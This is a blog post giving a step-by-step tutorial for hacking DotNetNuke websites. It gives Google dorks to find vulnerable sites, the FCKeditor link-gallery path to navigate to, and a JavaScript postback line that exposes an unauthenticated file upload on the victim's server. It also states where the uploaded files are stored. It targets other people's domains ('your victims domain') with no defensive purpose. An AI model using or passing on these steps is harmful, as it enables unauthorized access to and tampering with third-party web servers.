Website Hacking Technique through DNN
|
In the past articles, I have covered almost all type of website hacking methods by explaining you with complete details. Therefore, today I have founded a new way of web hacking known as DNN - DOTNetNuke which allows us to upload any thing to the web server of your victims domain etc.. Actually DotNetNuke is an open source web content management system based on Microsoft .NET technology. Please perform this attack in Google chrome, Mozilla Firefox or Opera only. Below is the procedure to perform it by simply using Google search engine.
Procedure
1. Open www.google.com
2. then search this dork to find vulnerable sites using Google or you can also find it yourself by doing other methods also…
:inurl:/tabid/36/language/en-US/Default.aspx
3. Now you will find many websites in the Google search as given below-
4. Choice one of the sites above and open it in the browser.
5. For ex- you choose- http://www.xyz.com/Home/tabid/36/Language/en-US/Default.aspx where xyz is domain name
6. Now replace- /Home/tabid/36/Language/en-US/Default.aspx
with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. and hit enter…
8. Hence, you will see this screen in the browser-
8. Choose the 3rd option above and then at the address bar, type this JavaScript below-
javascript:__doPostBack('ctlURL$cmdUpload','')
9. Done! Now you have the upload option coming at the site like this-
10. Now you can upload any type of file you want as for ex- txt, swf, jpg, gif, pdf Files etc..
11. After uploading files, your file is save in root folder and your address will be such as http://www.xyz.com/portals/0/krackoworld.txt and have full access.
12. Chapter closed here…
Tip - You can also use Google dork such as inurl:"/portals/0" to find more vulnerable sites above.
……………………………………………………………………………………………………………………………………………………………
Join me on Google+
|
Respected Readers :-
|
E njoyed this post very much – So why not you Subscribe to our regular Email Updates ! and stay connected with us forever .
0 comments :
Have any question? Feel free to Ask Below
Your feedback is always Precious to us.
I will try to answer all the queries as soon as possible.
Regards
karan chauhan